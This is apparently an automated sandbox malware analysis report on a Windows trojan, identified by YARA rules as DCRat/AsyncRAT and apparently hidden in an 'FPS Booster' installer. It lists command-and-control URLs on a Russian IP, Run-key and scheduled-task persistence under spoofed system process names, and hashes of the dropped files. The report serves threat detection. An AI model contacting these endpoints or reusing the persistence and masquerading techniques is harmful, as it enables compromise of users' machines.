                      http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3t&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3ttrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dItrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?k1RxxsMic1WB03Lj3Jl0wy=eC69X&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&k1RxxsMic1WB03Lj3Jl0wy=eC69Xtrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/@==AbhNnclZXauVHdsVXYmVGZtrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://sectigo.com/CPS0FPS Booster 2.0.7.exe.2.drfalse
                        		high
                        http://ocsp.sectigo.com0FPS Booster 2.0.7.exe.2.drfalse
                          		high
                          https://kb.fastpanel.direct/troubleshoot/WerFault.exe, 00000011.00000002.1426473572.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000011.00000002.1426473572.0000000002875000.00000004.00000800.00020000.00000000.sdmp, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000017.00000002.1520715428.0000000002A29000.00000004.00000800.00020000.00000000.sdmp, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000017.00000002.1520715428.00000000029FE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.1777779055.00000000025F4000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.1777779055.00000000025CA000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://188.120.228.203WerFault.exe, 00000011.00000002.1426473572.0000000002851000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000011.00000002.1426473572.0000000002875000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000011.00000002.1426473572.0000000002869000.00000004.00000800.00020000.00000000.sdmp, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000017.00000002.1520715428.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000017.00000002.1520715428.00000000029FE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.1777779055.00000000025CA000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.1777779055.00000000025B4000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://steamcommunity.com/profiles/explorer.exe.5.drfalse
                              		high
                              https://fpsbooster.ru/api/en/booster/install?is_agree=1/NOCANCELpostFPS Booster 2.0.7.exe, 00000007.00000002.2601726422.00000000007FB000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresexplorer.exe, 0000001B.00000002.1777779055.0000000002599000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://upx.sf.netAmcache.hve.6.drfalse
                                		high
                                https://fpsbooster.ru/api/en/booster/install?is_agree=0https://fps-booster.com/api/software/downloadFPS Booster 2.0.7.exe, 00000007.00000002.2601726422.00000000007FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sFPS Booster 2.0.7.exe.2.drfalse
                                  		high
                                  http://188.120.228.203/MathpoolCam/rulemessagerecord/screeXHSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000017.00000002.1518926243.0000000000AD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://nsis.sf.net/NSIS_ErrorErrorFPS Booster 2.0.7.exe, 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp, FPS Booster 2.0.7.exe, 00000007.00000000.1351054556.0000000000409000.00000002.00000001.01000000.00000009.sdmp, FPS Booster 2.0.7.exe.2.drfalse
                                    		high
                                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#FPS Booster 2.0.7.exe.2.drfalse
                                      		high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namesavesbrokerDriverSavesbroker.exe, 00000005.00000002.1397323956.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000011.00000002.1426473572.0000000002851000.00000004.00000800.00020000.00000000.sdmp, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000017.00000002.1520715428.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.1777779055.00000000025B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://fps-booster.com/api/software/download?branch=master&bits=x64getFPS Booster 2.0.7.exe, 00000007.00000002.2601726422.00000000007FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.ccleaner.com/ru-ruFPS Booster 2.0.7.exe, 00000007.00000002.2601726422.00000000007FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://188.120.228.203/MathpoolCam/rusavesbrokerDriverSavesbroker.exe, 00000005.00000002.1397323956.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000011.00000002.1426473572.00000000026A0000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000011.00000002.1426473572.0000000002845000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.1476991915.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000013.00000002.1476965095.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000017.00000002.1520715428.00000000029CD000.00000004.00000800.00020000.00000000.sdmp, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000017.00000002.1520715428.0000000002868000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.1777779055.0000000002438000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.1777779055.0000000002599000.00000004.00000800.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          188.120.228.203
                                          		unknownRussian Federation
                                          		29182THEFIRST-ASRUtrue

                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1563543
                                          Start date and time:2024-11-27 04:01:07 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 7m 28s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:32
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:UNFOT5F1qt.exe
                                          renamed because original name is a hash value
                                          Original Sample Name:1C40D9E61FBBD5D9054638B98B10E1CF.exe
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@22/28@0/1
                                          EGA Information:
                                          • Successful, ratio: 44.4%
                                          HCA Information:
                                          • Successful, ratio: 98%
                                          • Number of executed functions: 346
                                          • Number of non-executed functions: 59
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 20.42.65.92
                                          • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, PID 7672 because it is empty
                                          • Execution Graph export aborted for target HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, PID 8000 because it is empty
                                          • Execution Graph export aborted for target WerFault.exe, PID 7604 because it is empty
                                          • Execution Graph export aborted for target explorer.exe, PID 616 because it is empty
                                          • Execution Graph export aborted for target explorer.exe, PID 7664 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: UNFOT5F1qt.exe

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          03:02:04Task SchedulerRun new task: explorer path: "C:\Windows\regedit\explorer.exe"
                                          03:02:04AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run HSZUYllrTVQhIRaXpKBgYbmVnCoTc "C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe"
                                          03:02:05Task SchedulerRun new task: HSZUYllrTVQhIRaXpKBgYbmVnCoTc path: "C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe"
                                          03:02:05Task SchedulerRun new task: RuntimeBroker path: "C:\Documents and Settings\Public\Pictures\RuntimeBroker.exe"
                                          03:02:05Task SchedulerRun new task: WerFault path: "C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe"
                                          03:02:05Task SchedulerRun new task: WmiPrvSE path: "C:\Users\Default User\WmiPrvSE.exe"
                                          03:02:13AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Users\Default User\WmiPrvSE.exe"
                                          03:02:22AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WerFault "C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe"
                                          03:02:30AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run explorer "C:\Windows\regedit\explorer.exe"
                                          03:02:39AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Documents and Settings\Public\Pictures\RuntimeBroker.exe"
                                          22:02:07API Interceptor7x Sleep call for process: WerFault.exe modified
                                          22:02:16API Interceptor6x Sleep call for process: HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe modified
                                          22:02:42API Interceptor8x Sleep call for process: explorer.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          No context

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          s-part-0035.t-0009.t-msedge.netfile.exeGet hashmaliciousUnknownBrowse
                                          • 13.107.246.63
                                          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                          • 13.107.246.63
                                          file.exeGet hashmaliciousUnknownBrowse
                                          • 13.107.246.63
                                          HQV-224647.docxGet hashmaliciousHTMLPhisherBrowse
                                          • 13.107.246.63
                                          HQV-224647.docxGet hashmaliciousHTMLPhisherBrowse
                                          • 13.107.246.63
                                          GasProcessingPlantReportOfReceipts.xlsmGet hashmaliciousUnknownBrowse
                                          • 13.107.246.63
                                          file.exeGet hashmaliciousPureCrypter, Amadey, Cerbfyne Stealer, Credential Flusher, Cryptbot, LummaC Stealer, Poverty StealerBrowse
                                          • 13.107.246.63
                                          Impact replications.xlsmGet hashmaliciousUnknownBrowse
                                          • 13.107.246.63
                                          HpRXI8oMC1.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • 13.107.246.63
                                          https://eye.sbc31.net/m2?r=wAXNB1S4NjcyYWE1OWU4YjU5ODMzOTIyMDE1MThlxBDQudCvf9DH0Ns5RGzQktCKZ2wrLUbgpHRlc3Sxc2FtcGxlQHNhbXBsZS5jb22sKzMzNjEyMzQ1Njc4kLZEV3ZCbHJ1Y1JZMlFIa1B1LVVTTS1BoA==Get hashmaliciousHTMLPhisherBrowse
                                          • 13.107.246.63

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          THEFIRST-ASRURustChecker.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                          • 188.120.239.221
                                          https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23YWhvd2FyZEBzZWN1cnVzdGVjaG5vbG9naWVzLmNvbQ==Get hashmaliciousUnknownBrowse
                                          • 78.24.219.84
                                          https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23cnlhbi5lZHdhcmRzQGF2ZW50aXYuY29tGet hashmaliciousUnknownBrowse
                                          • 78.24.219.84
                                          https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23bWJsYW5kQHNlY3VydXN0ZWNobm9sb2dpZXMuY29tGet hashmaliciousUnknownBrowse
                                          • 78.24.219.84
                                          exe009.exeGet hashmaliciousEmotetBrowse
                                          • 37.46.129.215
                                          https://sourcetrap.netGet hashmaliciousUnknownBrowse
                                          • 82.202.163.23
                                          13LNMT6zmg.exeGet hashmaliciousDCRatBrowse
                                          • 80.87.201.118
                                          iwir64.elfGet hashmaliciousMiraiBrowse
                                          • 62.109.30.161
                                          2VaAObAYLP.exeGet hashmaliciousDCRatBrowse
                                          • 185.43.5.93
                                          sh4.elfGet hashmaliciousMiraiBrowse
                                          • 212.109.220.3

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe

                                          Download File
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):586240
                                          Entropy (8bit):5.885921147077287
                                          Encrypted:false
                                          SSDEEP:12288:IqnOvrM40FWBGCnO9Ke6/jGEn1E7idK9IbrDDiokL05t4:I+OvrM40FgDRlrGwSO4S7DP
                                          MD5:222EDC84E2D32948F2639554B23E7B04
                                          SHA1:22CEDF83A69B08259DB3C2F3618DF067DD7C7522
                                          SHA-256:55AB1B21734F31815058FA1E2841E8B62E6E4F04E635A4B51EBEA3FDE646E920
                                          SHA-512:95DD51CF8BE6461955B867B853D58EAB7BF6AC363E9F99F5C8C8F13046DAA373ED845DB3531E9F765515E43F8955955EC4EA83F19807A2B3C04F2C1F6A0C6855
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, Author: Joe Security
                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, Author: Joe Security
                                          • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, Author: ditekSHen
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 88%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L9a..........".................~.... ... ....@.. .......................`............@.................................(...S.... ..H....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...H.... ......................@..@.reloc.......@......................@..B................`.......H.......P.......................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                          C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\e7d19d53a5ec77aafa68c9a929149b118506bb42

                                          Download File
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:ASCII text, with very long lines (986), with no line terminators
                                          Category:dropped
                                          Size (bytes):986
                                          Entropy (8bit):5.906779991524349
                                          Encrypted:false
                                          SSDEEP:24:JixpGULbOcU+yJmxrBp8mQch00iCajyVJUDxZ+G66:MTGULCc1yoNvIjCdkgG66
                                          MD5:FD9DDE45A48F496F17501FA2DB1CB01E
                                          SHA1:29413808B260EC6B417CF44883D36FAFA4E43D50
                                          SHA-256:A726C980560B07D22FAD7DF425D1A631F377F27D2AC00DC10D68075891C2ADCC
                                          SHA-512:FF4268DAAF39B4288D2F0D8EFF6D06CB2A4FD5EDAB5A9DAA247209B2BA86CAC506BDB9ED0B4807877D87ECCBF2FD57A83285859ABDEA9CE500429B2E4F03B4DF
                                          Malicious:false
                                          Preview:HfKuCcBxBWV4M38b0mfxuznS8u5d5O3lkEt2zzejgKO9UMF8e5Q4gzOS12wSgi1xduTHJFlAI5Qklo7vo78978Fv0aA6DMC8Sbfk38yYTPvkinrM4Aojj2zeohRtEp663SSKIX2pJkpsNfMMtyBDidYZmB5VrFToTyqQVhDhI8a9MHRJUE9Qn3Ya32hHcg8DQBYYy60Mue5jCZMetvBmFCAZaQXc95ElAWsLs2VYNxgJ7yXeqCYqeV8OA87hiYMyaTjqrBw0ZmZRf1cl33w6hXGoXdKt4xzzkssoPqwoQhQ26qsJgWoplQQCM4SN0D5mxjrxIxVMGHqAGOsrvBMiJKOUcqbUXjyMloEX95AtAbjdkP58Mlby1XcnUWUbWBzgSdYbJUr0AdhskuuMucHvIAVOMbCnkjW9lCKG0dy24lxYztCjmIr34DYSIKPrSEQbGiGiknVQoP1gM6YdZcAc1dFio28pOGj0VWSQme99waOoM1FLwwSzDyjmdi3rppBhpAL0oH05cBpbOaVwww3cytwhwpxEkRTGYr9LqPgo5WWCIIYDMH52wjt5OoE9UwVLrjChbKGhPOgbWtYnQt1cWbUz7D7BKhUJBLVjF1lCBYmhCSiePask53zPONjYMEWs4WaLYziZIyb7yxwpecwuyuOIWFU2RNz7B4mp1XGa2TcGb1bba43uSl3KISySeqI48e63KGxGVV2fSHqfo2bXUFoZBchjjy5MLiI74iRTGxZ6tX2AmSomOuk3zg1rjOhgaqUt9skFlHQgpsqnkh6QKT7a7PIYqku1Q3fDDIA4siAHeDOGzOGBRQWHs4wtjLZBWYQvMnkcgCilS054BBicdsj9gYUJVQUgI9uFxc3MnnfPsuy281sin7hnyQOySbGPsCcSF0HjHWy0NURwjbKeiw3LcGQgNF4LgPgqRgxIuJaQJqae8cP0Rmr6IR08jkVCbmT8yleDoCtYVmBvqwhuzD44hk

                                          C:\ProgramData\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe

                                          Download File
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):586240
                                          Entropy (8bit):5.885921147077287
                                          Encrypted:false
                                          SSDEEP:12288:IqnOvrM40FWBGCnO9Ke6/jGEn1E7idK9IbrDDiokL05t4:I+OvrM40FgDRlrGwSO4S7DP
                                          MD5:222EDC84E2D32948F2639554B23E7B04
                                          SHA1:22CEDF83A69B08259DB3C2F3618DF067DD7C7522
                                          SHA-256:55AB1B21734F31815058FA1E2841E8B62E6E4F04E635A4B51EBEA3FDE646E920
                                          SHA-512:95DD51CF8BE6461955B867B853D58EAB7BF6AC363E9F99F5C8C8F13046DAA373ED845DB3531E9F765515E43F8955955EC4EA83F19807A2B3C04F2C1F6A0C6855
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 88%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L9a..........".................~.... ... ....@.. .......................`............@.................................(...S.... ..H....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...H.... ......................@..@.reloc.......@......................@..B................`.......H.......P.......................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_UNFOT5F1qt.exe_ddd5a359bec083eb107768e4877ccc21165f677_cc66c665_ceb690cb-b08c-4efe-b12a-db7df9fee6b4\Report.wer

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):1.0259638126222996
                                          Encrypted:false
                                          SSDEEP:192:eHlSnS0BU/Ha5aW9d4/zuiF5Z24IO8a5Y:qSZBU/6aZ/zuiF5Y4IO8cY
                                          MD5:021AF993098007A2C9ADD1779B397D71
                                          SHA1:C9289C906ACE22955A544559FF76886686822331
                                          SHA-256:13D504F8FFC91983744ED11B193DEAE5FB48228046325C2F10A3AE853CD9F7DD
                                          SHA-512:BB11C69A0F330897CCDD36EE4B96F123FEE70DD067355D24178ACD76EE504DCB98761FBA59CAC525C37C1D65CF3BDB3A1B6E3D87FA9A3455007C40590CAE3B70
                                          Malicious:true
                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.1.5.0.1.2.0.8.0.9.1.9.4.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.1.5.0.1.2.2.5.1.2.3.1.9.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.e.b.6.9.0.c.b.-.b.0.8.c.-.4.e.f.e.-.b.1.2.a.-.d.b.7.d.f.9.f.e.e.6.b.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.8.b.a.e.a.1.3.-.8.1.8.0.-.4.4.4.5.-.b.1.1.4.-.1.b.a.f.3.d.e.e.3.9.4.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.U.N.F.O.T.5.F.1.q.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.d.0.-.0.0.0.1.-.0.0.1.4.-.d.c.8.f.-.d.e.b.9.7.8.4.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.6.4.3.7.e.0.e.b.2.5.a.1.3.d.5.9.0.6.0.1.c.e.f.6.1.8.1.0.1.6.b.0.0.0.0.0.0.0.0.!.0.0.0.0.1.4.5.1.1.9.e.6.4.9.c.a.b.c.6.c.6.0.2.0.0.6.4.3.b.3.c.c.3.4.7.f.c.4.b.1.6.4.c.c.!.U.N.F.O.T.5.F.1.q.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.

                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER2082.tmp.dmp

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Mini DuMP crash report, 15 streams, Wed Nov 27 03:02:01 2024, 0x1205a4 type
                                          Category:dropped
                                          Size (bytes):250518
                                          Entropy (8bit):3.730273535896813
